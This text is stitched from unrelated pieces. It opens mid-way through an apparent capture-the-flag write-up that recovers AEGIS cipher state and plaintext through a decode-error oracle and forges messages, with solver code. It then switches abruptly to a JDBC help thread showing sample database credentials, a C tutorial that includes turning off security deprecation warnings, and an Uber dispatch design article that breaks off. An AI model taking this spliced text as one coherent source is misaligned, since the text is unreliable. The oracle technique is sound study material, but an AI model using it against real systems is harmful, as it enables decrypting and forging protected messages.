\[\begin{aligned} k^{(1)}_{20} \oplus k^{(2)}_{20} &= s^{(1)}_{21} \oplus s^{(2)}_{21} \\ &= \text{AESEnc}(s^{(1)}_{10}, s^{(1)}_{11}) \oplus \text{AESEnc}(s^{(2)}_{10}, s^{(2)}_{11}) \\ &= p(s^{(1)}_{10}) \oplus s^{(1)}_{11} \oplus p(s^{(2)}_{10}) \oplus s^{(2)}_{11} \\ &= p(s^{(1)}_{10}) \oplus p(s^{(2)}_{10}) \\ &= p\left(\text{AESEnc}(s^{(1)}_{07}, s^{(1)}_{00}) \oplus m^{(1)}_{00}\right) \oplus p\left(\text{AESEnc}(s^{(2)}_{07}, s^{(2)}_{00}) \oplus m^{(2)}_{00}\right) \\ &= p(x \oplus m^{(1)}_{00}) \oplus p(x \oplus m^{(2)}_{00}). \end{aligned}\]
(We define $x := \text{AESEnc}(s_{07}, s_{00}) = s_{10} \oplus m^{(1)}_{00}$ for ease of reading.)
And now the only unknown is $x$. Can we solve it easily? Yes indeed: we can compute bytes 0, 5, 10 and 15 of $x$ from the first four bytes of $k^{(1)}_{20} \oplus k^{(2)}_{20}$. Along with three more equalities from p, we are able to recover $x$ completely. I used a meet-in-the-middle approach to solve for $x$ in five seconds.
But wait, there is a problem: I find 65536 candidates (or even more) instead of 1, and I am unable to eliminate the rest. The number of possible states would grow exponentially! What can I do? The solution is actually simple: just send $M^{(3)}$ and compute another solution set for $x$. It is very likely that $x$ is the only element in the intersection of the two sets. With $x$, we are able to compute $s_{10}$ (and, analogously, $s_{14}$).
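The meet-in-the-middle split can be sketched on a one-word toy version of the problem. T0 and T1 below are random stand-ins for the real AES T-tables, and the constants are made up; only the tabulate-one-half, scan-the-other structure carries over:

```python
# Toy MITM: solve T0[x0^a0] ^ T1[x1^a1] ^ T0[x0^b0] ^ T1[x1^b1] = c
# for (x0, x1). Rearranged: the x0-only half XOR c must equal the x1-only half.
import random

random.seed(1)
T0 = [random.getrandbits(32) for _ in range(256)]
T1 = [random.getrandbits(32) for _ in range(256)]

a, b = (0x00, 0x00), (0x11, 0x11)
secret = (0x42, 0x99)
c = (T0[secret[0] ^ a[0]] ^ T1[secret[1] ^ a[1]]
     ^ T0[secret[0] ^ b[0]] ^ T1[secret[1] ^ b[1]])

# Tabulate every x0-dependent half, then meet it with each x1 half:
lhs = {}
for x0 in range(256):
    lhs.setdefault(T0[x0 ^ a[0]] ^ T0[x0 ^ b[0]] ^ c, []).append(x0)

solutions = [(x0, x1) for x1 in range(256)
             for x0 in lhs.get(T1[x1 ^ a[1]] ^ T1[x1 ^ b[1]], [])]
assert secret in solutions   # ~2*2^8 table passes instead of 2^16 brute force
```

The real solver does this per 32-bit output word with two bytes on each side of the meet, which is why each word can still yield multiple candidates.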
Part III: Finishing the first part of the challenge
We can extend the above idea to leak more. By sending two 128-byte messages with blocks 3 and 4 being different, we are able to recover $s_{20}$ and $s_{24}$. We are able to leak $s_{30}$ and $s_{34}$ with the same idea.
Two more questions remain: How is it made possible in seven queries? And more importantly, how can we recover $s_{ij}$ for all $j$, for some $i$ (preferably $i = 0\ \text{or}\ 1$)?
Challenge 1. Recover the above states in 7 queries.
In short, we are encrypting these seven plaintexts (each 0 represents 16 \x00's, etc):
1. 0000000000
2. 0000110000
3. 0000220000 - Derive $s_{10}$ and $s_{14}$ uniquely with (1) and (2)
4. 0000001100
5. 0000002200 - Derive $s_{20}$ and $s_{24}$ uniquely with (1) and (4)
6. 0000000011
7. 0000000022 - Derive $s_{30}$ and $s_{34}$ uniquely with (1) and (6)
Challenge 2. Recover $s_{1, j}$ for all $j$.
From above, we are able to derive $s_{i, 0}$ and $s_{i, 4}$ for $i = 1, 2, 3$ with $m_{ij} = 0$. Hence, the state transition would be $s_{i+1, j} \leftarrow p(s_{i, j-1}) \oplus s_{ij}$ for all $i, j$. Equivalently $s_{i, j-1} = p^{-1}(s_{i+1, j} \oplus s_{ij})$.
We are able to compute $p^{-1}$ easily. Solving a system of equations would also work, but I'm doing it with meet-in-the-middle. Code reuse for the win! For now, let's visualize how the $s_{1, j}$'s can be derived.
digraph { graph [bgcolor="transparent"] node [color="#ffe4e1", fontcolor="#ffe4e1", fillcolor="#33333c", style="filled"] edge [color="#ffe4e1", fontcolor="#ffe4e1"] rankdir=BT s₁₀[fillcolor="#55555c", style="filled"] s₁₄[fillcolor="#55555c", style="filled"] s₂₀[fillcolor="#55555c", style="filled"] s₂₄[fillcolor="#55555c", style="filled"] s₃₀[fillcolor="#55555c", style="filled"] s₃₄[fillcolor="#55555c", style="filled"] s₂₀ -> s₂₇ s₃₀ -> s₂₇ s₂₄ -> s₂₃ s₃₄ -> s₂₃ s₁₄ -> s₁₃ s₂₄ -> s₁₃ s₁₃ -> s₁₂ s₂₃ -> s₁₂ s₁₀ -> s₁₇ s₂₀ -> s₁₇ s₁₇ -> s₁₆ s₂₇ -> s₁₆ s₁₂ -> s₁₁ s₁₃ -> s₁₁ s₁₆ -> s₁₁ s₁₆ -> s₁₅ s₁₇ -> s₁₅ s₁₂ -> s₁₅ }
With that, the first part of the challenge is done.
Part IV: AEGIS-128 vs AEGIS-128L
For the second part, AEGIS-128 is used. The state is now 80 bytes (five 16-byte blocks), and the payload size is reduced to one block (denote it by $m$). This is how the state transitions:
• $s_{i+1, 0} \leftarrow p(s_{i, 4}) \oplus s_{i, 0} \oplus m$, and
• $s_{i+1, j} \leftarrow p(s_{i, j-1}) \oplus s_{i, j}$ for $1 \leq j \leq 4$.
Moreover, the keystream $k_i$ for the $i$-th round is also altered: $k_i = (s_{i, 2} \wedge s_{i, 3}) \oplus s_{i, 1} \oplus s_{i, 4}$.
Part V: Exploring the challenge
I have no idea what's going on, so I decided to recover the printable secret_plaintext first.
It is pretty easy, and is made possible because we are able to receive the error from the oracle. In particular, from pt.decode("ascii").
We are able to recover the plaintext with bit-flipping. To begin with, we can flip the whole ciphertext by \x80. The first 32 bytes of the plaintext would be flipped by \x80 as well. If we send the flipped ciphertext (denote it by $c_?$) to the oracle, we will obtain:
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe7 in position 0: ordinal not in range(128)
This means that the first byte of the flipped plaintext is \xe7. Hence, the first byte of the plaintext is \x67 (g). If we then flip the first byte of $c_?$ by \x80 and send it to the oracle, we receive another error:
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc6 in position 1: ordinal not in range(128)
This recovers the second byte, \x46 (F). Since the secret plaintext is 96 bytes long, we can recover it with 96 oracle calls.
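The recovery loop can be simulated locally against a toy oracle that, like pt.decode("ascii"), reports the position and value of the first non-ASCII byte. The keystream and plaintext below are stand-ins, not the challenge's real values:

```python
# Local simulation of byte-by-byte plaintext recovery via \x80 bit flips.
def oracle(ct, keystream):
    pt = bytes(c ^ k for c, k in zip(ct, keystream))
    for pos, byte in enumerate(pt):
        if byte >= 0x80:
            return pos, byte        # mimics UnicodeDecodeError's position/byte
    return None                     # "OK": plaintext is pure ASCII

keystream = bytes(range(96))        # stand-in for the real cipher's keystream
secret = b"gF" + b"x" * 94          # unknown printable plaintext
ct = bytes(c ^ k for c, k in zip(secret, keystream))

flipped = bytes(c ^ 0x80 for c in ct)   # flip every plaintext byte's top bit
recovered = b""
for i in range(96):
    pos, byte = oracle(flipped, keystream)
    assert pos == i                     # error always lands on the next byte
    recovered += bytes([byte ^ 0x80])   # undo the flip to get the true byte
    flipped = flipped[:i] + bytes([flipped[i] ^ 0x80]) + flipped[i + 1:]

assert recovered == secret
```

Each query fixes one more byte back to ASCII, so the decode error marches forward one position per call, leaking exactly one plaintext byte each time.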
REMAINING ORACLE CALLS: 231 - 96 = 135.
With the plaintext recovered, it is time for us to try to recover the internal state. Can we devise a strategy similar to the first part of the challenge? Formally, what happens if we have two 48-byte messages $M^{(1)} := (m^{(1)}_0, m^{(1)}_1, m^{(1)}_2)$ and $M^{(2)} := (m^{(2)}_0, m^{(2)}_1, m^{(2)}_2)$ in which only the first block differs? Then the last 16 bytes of the keystream will be:
\[ \begin{aligned} k^{(1)}_2 \oplus k^{(2)}_2 &= \left[ (s^{(1)}_{22} \wedge s^{(1)}_{23}) \oplus s^{(1)}_{21} \oplus s^{(1)}_{24} \right] \oplus \left[ (s^{(2)}_{22} \wedge s^{(2)}_{23}) \oplus s^{(2)}_{21} \oplus s^{(2)}_{24} \right] \\ &= s^{(1)}_{21} \oplus s^{(2)}_{21} \\ &= p(s^{(1)}_{10}) \oplus s^{(1)}_{11} \oplus p(s^{(2)}_{10}) \oplus s^{(2)}_{11} \\ &= p(s^{(1)}_{10}) \oplus p(s^{(2)}_{10}) \\ &= p\left(\text{AESEnc}(s^{(1)}_{04}, s^{(1)}_{00}) \oplus m^{(1)}_0\right) \oplus p\left(\text{AESEnc}(s^{(2)}_{04}, s^{(2)}_{00}) \oplus m^{(2)}_0\right) \\ &= p(x \oplus m^{(1)}_0) \oplus p(x \oplus m^{(2)}_0). \end{aligned} \]
Here we denote $x := \text{AESEnc}(s_{04}, s_{00}) = s_{10} \oplus m^{(1)}_0$. Simply put, if we have the ciphertexts for $M^{(1)}$ and $M^{(2)}$ (denote them as $C^{(k)} = (c^{(k)}_0, c^{(k)}_1, c^{(k)}_2)$), we are able to recover one-fifth of the state.
How are we able to do it? Well actually, we have recovered the secret plaintext above. We can flip the first block of the ciphertext arbitrarily (to $C_?$).
However, since $k^{(2)}_2$ is altered, the third block of the message would be updated. Luckily we are able to recover the message in 17 oracle calls. Here's how:
1. Sends $C_?$. We will obtain something like this: UnicodeDecodeError: 'ascii' codec can't decode byte 0xe8 in position 34...
2. Flips the 35th byte by \xe8 in $C_?$. Sends the patched $C_?$: UnicodeDecodeError: 'ascii' codec can't decode byte 0xcb in position 35...
3. Flips the 36th byte by \xcb in $C_?$. Repeat the process until we receive OK, meaning that the plaintext is now ASCII-encoded.
4. For now, we have recovered a subset of message bytes. We then flip the unknown bytes by \x80 (for example, bytes 33 and 34) to throw errors from the oracle.
5. Repeat step 1 until all unknown bytes are recovered.
In short, we spend 16 oracle calls to recover the message, and one oracle call that tells us which bytes were originally printable so we can flip them back. We are then able to recover a candidate set for $s_{10}$ with 65536 entries (or more), and we can spend another 17 queries to pin down the actual $s_{10}$.
REMAINING ORACLE CALLS: 135 - 17×2 = 101.
With the same idea, we can recover $s_{20}, s_{30}, s_{40}$ with 17×6 queries. This would allow us to recover $s_{10}, s_{11}, ..., s_{14}$ and hence forging arbitrary messages (along with a slightly longer AD).
REMAINING ORACLE CALLS: 101 - 17×6 = -1.
Shoot - we are one query short. Since we are able to recover one byte of the plaintext per query, it doesn't hurt to sacrifice one oracle call by guessing one byte. So... in theory, we are able to finish the challenge once every 256 attempts.
Luckily, if the guessed byte (and hence the derived keystream) is incorrect, we will fail to recover any consistent $s_*$, which immediately exposes the wrong guess. That's pretty good: we are able to solve the challenge every time.
REMAINING ORACLE CALLS: -1 + 1 = 🎉.
With the exploit script written, I am able to reach the very end locally. Congratulations to me!
Part VI: Wait... Aren't we done?
No... When I interacted with the server, I was always disconnected while sending one of the 231 oracle calls. After asking the organizers on IRC, I learned that there was a 1-minute timeout - it was later increased to 10 minutes. Unfortunately, my solution runs for around 5 minutes. I had two choices:
1. Wait until the challenge has a 10-minute timeout, or
2. Optimize the script and have it completed in one minute.
Seeing that a few teams had already solved the challenge, I thought (2) would be fun.
6.1. Reducing online complexity
For inputs that do not require immediate feedback, we can send them all at once and read the responses afterwards. Here is an example from recovering secret_plaintext in the second part.
# Before optimization
test_ciphertext = bytes([c^0x80 for c in ciphertext])
m0 = b''
for i in range(96):
    r.sendline(base64.b64encode(test_ciphertext))
    test_ciphertext = cxor(test_ciphertext, i, 0x80)
    p, mc = try_decrypt_read(r)
    assert p == i
    m0 += bytes([mc^0x80])

# After optimization
test_ciphertext = bytes([c^0x80 for c in ciphertext])
m0 = b''
for i in range(96):
    r.sendline(base64.b64encode(test_ciphertext))
    test_ciphertext = cxor(test_ciphertext, i, 0x80)
for i in range(96):
    p, mc = try_decrypt_read(r)
    assert p == i
    m0 += bytes([mc^0x80])
6.2. Reducing offline complexity
For example, this is the method I implemented to solve for $x$ from $p(x \oplus a) \oplus p(x \oplus b) = c$ - it takes one second each time:
def px_subsolve(a_sub, b_sub, c_sub):
    # Given a_sub, b_sub, c_sub (4 bytes), find x_sub such that
    #   te0[(x_sub ^ a_sub)[0]] ^ te1[(x_sub ^ a_sub)[1]] ^ te2[(x_sub ^ a_sub)[2]] ^ te3[(x_sub ^ a_sub)[3]]
    # ^ te0[(x_sub ^ b_sub)[0]] ^ te1[(x_sub ^ b_sub)[1]] ^ te2[(x_sub ^ b_sub)[2]] ^ te3[(x_sub ^ b_sub)[3]]
    # = c_sub
    # Reformulating:
    #   te0[(x_sub ^ a_sub)[0]] ^ te1[(x_sub ^ a_sub)[1]] ^ te0[(x_sub ^ b_sub)[0]] ^ te1[(x_sub ^ b_sub)[1]] ^ c_sub
    # = te2[(x_sub ^ a_sub)[2]] ^ te3[(x_sub ^ a_sub)[3]] ^ te2[(x_sub ^ b_sub)[2]] ^ te3[(x_sub ^ b_sub)[3]]
    lhss = {}
    for x0, x1 in itertools.product(range(256), repeat=2):
        # LHS
        xs = [be0[x0^a_sub[0]], be0[x0^b_sub[0]], be1[x1^a_sub[1]], be1[x1^b_sub[1]], c_sub]
        y = reduce(_xor, xs)
        lhss[y] = lhss.get(y, []) + [(x0, x1)]
    solns = []
    for x2, x3 in itertools.product(range(256), repeat=2):
        # RHS
        xs = [be2[x2^a_sub[2]], be2[x2^b_sub[2]], be3[x3^a_sub[3]], be3[x3^b_sub[3]]]
        y = reduce(_xor, xs)
        for x0, x1 in lhss.get(y, []):
            solns.append(bytes([x0, x1, x2, x3]))
    return solns
However, if we force a_sub == b'\0'*4 and b_sub == b'\1'*4 or b_sub == b'\2'*4, the right-hand side can be precomputed once and reused. We are then able to solve for $x$ once every 0.2 seconds.
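That precomputation can be sketched as follows (an illustrative toy: precompute_rhs is a hypothetical helper, and the identity table below stands in for the real AES T-tables):

```python
import itertools

def precompute_rhs(be2, be3, a_sub, b_sub):
    # Build the map RHS-value -> [(x2, x3)] once. Since a_sub and b_sub are
    # fixed across queries, this table can be reused for every new c_sub:
    # only the 65536-entry LHS loop then runs per query.
    rhs = {}
    for x2, x3 in itertools.product(range(256), repeat=2):
        y = (be2[x2 ^ a_sub[2]] ^ be2[x2 ^ b_sub[2]]
             ^ be3[x3 ^ a_sub[3]] ^ be3[x3 ^ b_sub[3]])
        rhs.setdefault(y, []).append((x2, x3))
    return rhs

# Toy demonstration with an identity table instead of the AES T-tables:
table = list(range(256))
rhs = precompute_rhs(table, table, b'\0' * 4, b'\1' * 4)
assert sum(len(v) for v in rhs.values()) == 65536
```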
At last - we are able to get the flag in 30 seconds locally and around 55 seconds online! 🎉
Credits
• Thanks @harrier_lcc, who noticed that my lever did not hurt. Playing too much Minecraft, I misspelt liver.
• Thanks @hellman1908 for pointing out that we can bruteforce byte by byte instead of bruteforcing columns, since we can apply the MixColumns inverse.
Solved
What is wrong with my JDBC database?
Posted on 2009-05-15
Last Modified: 2013-12-15
This is the original code given by my instructor. Supposedly it is supposed to compile; however, I can't get it to, and cannot figure out why.
I have some things to add to it, but if I can't get it to compile in the first place, then well...
I'd appreciate some help figuring out what I'm either not doing or what I'm doing wrong.
I added ojdbc14.jar to my project so I could connect to the database
I created a file in the src folder called parm.properties
here is contents:
CONN_URL=jdbc:oracle:thin:@localhost:1521:xe
DB_USERNAME=hr
DB_PASSWORD=hrpassword
DB_DRIVER=oracle.jdbc.driver.OracleDriver
package database_challenge;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.Properties;
/**
* Class file to pull parameters from a file
* @author B_Acs
*
*/
public class Parm {
private static Properties props = null;
static {
try {
props = new Properties();
Class s = Class.forName("Database.Parm");
props.load(s.getResourceAsStream("/parm.properties"));
} catch (FileNotFoundException fnfe) {
System.out.println(fnfe.getMessage());
} catch (IOException ioe) {
System.out.println(ioe.getMessage());
} catch (ClassNotFoundException cnfe) {
System.out.println(cnfe.getMessage());
}
}
// empty constructor
private Parm() {
}
public static String getSystemSetting(String pVariable) {
if (props != null) {
return ((String) props.getProperty(pVariable));
} else {
System.out.println("system variables were never initialized.");
return null;
}
}
}
//***********************************************************************************************
package database_challenge;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;
/**
* Class used to connect allow for connections
* to the Oracle database
* @author B_Acs
*
*/
public class ConnectionManager {
// setting up static variables for use with the connection
private static final String DRIVER = Parm.getSystemSetting("DB_DRIVER");
private static final String CONN_URL = Parm.getSystemSetting("CONN_URL");
private static final String USER_NAME = Parm.getSystemSetting("DB_USERNAME");
private static final String PASSWORD = Parm.getSystemSetting("DB_PASSWORD");
// empty constructor
private ConnectionManager() {
}
/**
* Method to make a connection to the database
* @return
* @throws SQLException
*/
public static Connection makeConnection() throws SQLException {
// initializing connection
Connection conn = null;
try {
Class.forName(DRIVER);
conn = DriverManager.getConnection(CONN_URL, USER_NAME, PASSWORD);
conn.setAutoCommit(false);
} catch (ClassNotFoundException cnfe) {
System.out.println(cnfe.getMessage());
}
return conn;
}
}
//*******************************************************************************************
package database_challenge;
/**
* Wrapper class used to set and retrieve
* data about an employee
* @author B_Acs
*
*/
public class EmployeesWrapper {
private String firstName;
private String lastName;
private String email;
private String phoneNumber;
private String hireDate;
private double salary;
// accessor and mutator methods (getters and setters)
public String getFirstName() {
return firstName;
}
public void setFirstName(String firstName) {
this.firstName = firstName;
}
public String getLastName() {
return lastName;
}
public void setLastName(String lastName) {
this.lastName = lastName;
}
public String getEmail() {
return email;
}
public void setEmail(String email) {
this.email = email;
}
public String getPhoneNumber() {
return phoneNumber;
}
public void setPhoneNumber(String phoneNumber) {
this.phoneNumber = phoneNumber;
}
public String getHireDate() {
return hireDate;
}
public void setHireDate(String hireDate) {
this.hireDate = hireDate;
}
public double getSalary() {
return salary;
}
public void setSalary(double salary) {
this.salary = salary;
}
}
//******************************************************************************************
package database_challenge;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
/**
* Class to communicate to the database
* and display results.
* @author B_Acs
*
*/
public abstract class DatabaseService {
// static variable used for our select statement
// helps to prevent sql injection
private static final String SELECT_EMPLOYEES;
/**
* Method to return an array list of employees
* @return
*/
public static ArrayList getEmployees() {
// initializing connection
Connection conn = null;
// initializing statement
PreparedStatement stmt = null;
// initializing result set
ResultSet rs = null;
// initializing return value
ArrayList returnVal = new ArrayList();
try {
// getting connection
conn = ConnectionManager.makeConnection();
// setting the statement
stmt = conn.prepareStatement(SELECT_EMPLOYEES);
// filling the result set with results from the query
rs = stmt.executeQuery();
// looping through the result set
while (rs.next()) {
// creating an employee object
EmployeesWrapper ew = new EmployeesWrapper();
// setting the first name in the object
ew.setFirstName(rs.getString("FIRST_NAME"));
// setting the last name in the object
ew.setLastName(rs.getString("LAST_NAME"));
// adding the object to the array list
returnVal.add(ew);
}
// closing the statement
stmt.close();
} catch (SQLException esql) {
System.out.println(esql.getMessage());
} finally {
try {
if(conn != null) {
conn.close();
conn=null;
}
} catch (SQLException esql) {
System.out.println(esql.getMessage());
}
}
// returning the array list
return returnVal;
}
// static block of code for the sql statement
static {
StringBuffer tempBuffer = null;
tempBuffer = new StringBuffer();
tempBuffer.append("SELECT LAST_NAME, FIRST_NAME FROM EMPLOYEES");
SELECT_EMPLOYEES = tempBuffer.toString();
}
/**
* Main method to test our retrieval of data from the database
* @param args
*/
public static void main(String[] args) {
// initializing an array list, filling it with a list
// of employee objects from the database.
ArrayList e = DatabaseService.getEmployees();
// looping through the array list
for(int x = 0; x < e.size(); x++) {
// getting the employee object from the array list one at a time
EmployeesWrapper ew = (EmployeesWrapper) e.get(x);
// printing to the screen the employee first and last names
System.out.println(ew.getFirstName() + " " + ew.getLastName());
}
}
}
Question by:b_acs
Author Comment
by:b_acs
ID: 24399566
Oh yeah, here are the results when I run this:
Database.Parm
Exception in thread "main" java.lang.NullPointerException
at java.lang.Class.forName0(Native Method)
at java.lang.Class.forName(Unknown Source)
at database_challenge.ConnectionManager.makeConnection(ConnectionManager.java:35)
at database_challenge.DatabaseService.getEmployees(DatabaseService.java:38)
at database_challenge.DatabaseService.main(DatabaseService.java:91)
LVL 3
Expert Comment
by:hazgoduk
ID: 24400317
It's really easy to get content from a properties file. Create a file called test.properties in the folder containing build.xml.
Have just the following text in it.
test = abc
Properties properties = new Properties();
try
{
    properties.load(new FileInputStream("test.properties"));
    String test = properties.getProperty("test");
    System.out.println("test: |"+test+"|");
}
catch(Exception e)
{
    e.printStackTrace();
}
LVL 3
Expert Comment
by:hazgoduk
ID: 24400388
Sorry, totally missed your bit at the top with the file contents...
Properties properties = new Properties();
try
{
    properties.load(new FileInputStream("test.properties"));
    String CONN_URL = properties.getProperty("CONN_URL");
    System.out.println("CONN_URL: |"+CONN_URL+"|");
    String DB_USERNAME = properties.getProperty("DB_USERNAME");
    System.out.println("DB_USERNAME: |"+DB_USERNAME+"|");
    String DB_PASSWORD = properties.getProperty("DB_PASSWORD");
    System.out.println("DB_PASSWORD: |"+DB_PASSWORD+"|");
    String DB_DRIVER = properties.getProperty("DB_DRIVER");
    System.out.println("DB_DRIVER: |"+DB_DRIVER+"|");
}
catch(Exception e)
{
    e.printStackTrace();
}
LVL 16
Accepted Solution
by:
warturtle earned 1600 total points
ID: 24402917
The NullPointerException appears because the required file cannot be found, and hence cannot be loaded and read from. Make sure that the properties file is in the correct place.
Class.forName(DRIVER); is the specific line generating the exception: DRIVER is null because the properties were never loaded.
Author Comment
by:b_acs
ID: 24404167
Where should the properties file be placed? I have it in the same folder as the class files.....
Author Comment
by:b_acs
ID: 24404173
LOL That was the problem. I was supposed to have it in the source folder but not included in the package.
It is working now, thank you!
LVL 16
Expert Comment
by:warturtle
ID: 24404207
Hahaha... all of us make silly mistakes while coding, but it's good to see that it has been resolved. Feel free to close the ticket.
Author Comment
by:b_acs
ID: 24404295
Ok I have a better question for this same assignment.
I need to put the list in alphabetical order by lastname, firstname.
Now I know I need to put in an ORDER BY clause but I am unsure as to where it would go to work correctly.
If you want, I will post a new question.
LVL 16
Assisted Solution
by:warturtle
warturtle earned 1600 total points
ID: 24404369
The statement that you need to modify is this one: tempBuffer.append("SELECT LAST_NAME, FIRST_NAME FROM EMPLOYEES");
It needs changing to:
tempBuffer.append("SELECT LAST_NAME, FIRST_NAME FROM EMPLOYEES ORDER BY LAST_NAME, FIRST_NAME ASC");
We don't really need to specify ASC since ascending is the default sort order (and note that ASC here applies only to FIRST_NAME; each column in an ORDER BY takes its own direction), but I included it for clarity.
Hope it helps.
Author Closing Comment
by:b_acs
ID: 31582096
Thank you! I just missed that Select statement..... I knew that's what I was looking for but I guess I've just been looking at too much code recently....lol
LVL 16
Expert Comment
by:warturtle
ID: 24405753
Glad to be of assistance :)
C language error C4996: This function or variable may be unsafe
I. What is error C4996
error C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
A normal call to fopen / memcpy / strcpy and similar functions raises error C4996 because many functions, member functions, template functions, and global variables in the Visual Studio libraries are marked as deprecated. They are deprecated because they may have a different preferred name, may be unsafe or have a more secure variant, or may be obsolete. Many deprecation messages include a suggested replacement for the deprecated function or global variable.
II. How to fix error C4996
1. Use the secure _s variants
Replace the fopen call above with fopen_s, for example:
/******************************************************************************************/
//@Author: 猿说编程
//@Blog (personal blog): www.codersrc.com
//@File: C tutorial - C language error C4996: This function or variable may be unsafe
//@Time: 2021/06/03 08:00
//@Motto: A journey of a thousand miles is made step by step, and great rivers form from small streams; a rewarding programming career takes persistent accumulation!
/******************************************************************************************/
#include "stdafx.h"
#include <stdio.h>
#include <iostream>
#include "windows.h"
using namespace std;

int _tmain(int argc, _TCHAR* argv[])
{
    //FILE* fp = fopen("d:/12345633.txt", "r"); // error C4996
    FILE* fp = NULL;
    fopen_s(&fp, "d:/12345633.txt", "r"); // OK version
    if (fp)
    {
        printf("File opened successfully \n");
        fclose(fp);
    }
    else
        printf("Failed to open file, error code: %d \n", GetLastError());
    system("pause");
    return 0;
}
2. Turn off Visual Studio's "Security Development Lifecycle (SDL) checks"
[Figure: disabling SDL checks in the Visual Studio project properties]
3.#pragma warning( disable : 4996)
/******************************************************************************************/
//@Author: 猿说编程
//@Blog (personal blog): www.codersrc.com
//@File: C tutorial - C language error C4996: This function or variable may be unsafe
//@Time: 2021/06/03 08:00
//@Motto: A journey of a thousand miles is made step by step, and great rivers form from small streams; a rewarding programming career takes persistent accumulation!
/******************************************************************************************/
#include "stdafx.h"
#include <stdio.h>
#include <iostream>
#include "windows.h"
using namespace std;

#pragma warning( disable : 4996)

int _tmain(int argc, _TCHAR* argv[])
{
    FILE* fp = fopen("d:/12345633.txt", "r");
    if (fp)
    {
        printf("File opened successfully \n");
        fclose(fp);
    }
    else
        printf("Failed to open file, error code: %d \n", GetLastError());
    system("pause");
    return 0;
}
4. _CRT_SECURE_NO_WARNINGS
Project => Properties => C/C++ => Preprocessor => open Preprocessor Definitions, edit it, and add _CRT_SECURE_NO_WARNINGS, as shown below:
[Figure: adding _CRT_SECURE_NO_WARNINGS to the preprocessor definitions]
III. You may also like
1. Install Visual Studio
2. Install the Visual Studio plugin Visual Assist
3. Uninstall Visual Studio 2008
4. Uninstall Visual Studio 2003/2015
5. Set Visual Studio fonts/background/line numbers
6. C format specifiers/placeholders
7. C logical operators
8. C ternary operator
9. C comma expressions
10. C increment and decrement operators (++i / i++)
11. C for loops
12. C break and continue
13. C while loops
14. C do while vs. while loops
15. C switch statements
16. C goto statements
17. C char strings
18. C strlen function
19. C sizeof function
20. Difference between sizeof and strlen in C
21. C strcpy function
22. C strcpy_s function
23. C memcpy function
24. C memcpy_s function
25. C language error C4996: This function or variable may be unsafe
The challenging thing is to supply demand with a variable supply!!
Uber's technology may look simple: a user requests a ride from the app, and a driver arrives to take them to their destination.
Behind the scenes, however, a giant infrastructure consisting of thousands of services and terabytes of data supports each and every trip on the platform.
Like most web-based services, the Uber backend system started out as a "monolithic" software architecture with a bunch of app servers and a single database.
If you are looking for System Design of UBER, here is a video I made
For more System design videos please subscribe my channel: Tech Dummies
The system was mainly written in Python and used SQLAlchemy as the ORM-layer to the database. The original architecture was fine for running a relatively modest number of trips in a few cities.
After 2014, the architecture evolved into a service-oriented architecture with hundreds of services.
Uber's backend is now designed to handle not just taxis; it can also handle food delivery and cargo.
The backend primarily serves mobile phone traffic; the Uber app talks to the backend over mobile data.
Uber's Dispatch system acts like a real-time marketplace that matches drivers with riders using mobile phones.
So we need two services
1. Supply service
2. Demand service
Going forward, I will use "supply" for cabs and "demand" for riders.
Supply service:
• The Supply Service tracks cars using geolocation (lat and long). Every active cab keeps sending its lat-long to the server once every 5 seconds.
• The state machines of all of the supply are also kept in memory.
• To track vehicles there are many attributes to model: number of seats, type of vehicle, the presence of a car seat for children, whether a wheelchair can fit, and so on.
• Allocation needs to be tracked. A vehicle, for example, may have three seats but two of those are occupied.
Demand service
• The Demand Service tracks the GPS location of the user when a ride is requested.
• It tracks the requirements of the order, such as whether the rider needs a small car, a big car, a pool ride, etc.
• Demand requirements must be matched against supply inventory.
Now we have supply and demand. All we need is a service that matches demand to supply; at Uber that service is called DISCO.
DISCO: Dispatch Optimization
This service runs on hundreds of processes.
Core requirements of the dispatch system
1. reduce extra driving.
2. reduce waiting time
3. lowest overall ETA
How does the Dispatch system work? How are riders matched to drivers?
GPS/location data is what drives the dispatch system, which means we have to model our maps and location data.
1. The earth is a sphere. It's hard to do summarization and approximation based purely on longitude and latitude. So Uber divides the earth into tiny cells using the Google S2 library. Each cell has a unique cell ID.
2. S2 can give the coverage for a shape. If you want to draw a circle with a 1 km radius centered on London, S2 can tell you which cells are needed to completely cover the shape.
1. Since each cell has an ID, the ID is used as a sharding key. When a location comes in from supply, the cell ID for the location is determined. Using the cell ID as a shard key, the location of the supply is updated. It is then sent out to a few replicas.
2. To match riders to drivers, or just to display cars on a map, DISCO sends a request to geo by supply.
3. The system filters all cabs by the rider's GPS location data to get nearby cabs that meet the rider's requirements. Using the cell IDs from the circle area, all the relevant shards are contacted to return supply data.
4. Then the list and requirements are sent to routing/ETA to compute how nearby the cabs are, not geographically, but by the road system.
5. Sort by ETA, then send the result back to the supply system to offer it to a driver.
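The cell-based lookup in the steps above can be sketched in a few lines. This is a hypothetical toy: it uses a fixed lat/lng grid as a stand-in for S2 cell IDs (real S2 cells are hierarchical and roughly equal-area), just to show how a rider's location maps to a set of covering cells and how each cell maps to a shard:

```python
def cell_id(lat, lng, cell_deg=0.01):
    # Toy fixed-grid stand-in for an S2 cell ID (~1.1 km squares at the equator).
    return (int((lat + 90.0) / cell_deg), int((lng + 180.0) / cell_deg))

def covering_cells(lat, lng, ring=1):
    # Cells covering a small area around the rider (here: a square of cells).
    r, c = cell_id(lat, lng)
    return [(r + dr, c + dc)
            for dr in range(-ring, ring + 1)
            for dc in range(-ring, ring + 1)]

def shard_for(cell, n_shards=16):
    # The cell ID is the shard key: every update and query for this cell
    # goes to the same shard.
    return hash(cell) % n_shards

# A rider in London: contact every shard owning one of the covering cells.
cells = covering_cells(51.5074, -0.1278)
shards = {shard_for(c) for c in cells}
assert len(cells) == 9 and all(0 <= s < 16 for s in shards)
```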
How To Scale Dispatch System?
There are many ways you could build this, but at Uber:
1. Dispatch is built using Node.js. The advantage of Node is its asynchronous, event-based framework; it also lets you send and receive messages over WebSockets.
2. So at any time the client can send a message to the server, or the server can push a message whenever it wants to.
3. Now, how do we distribute dispatch computation across processes on the same machine and across multiple machines?
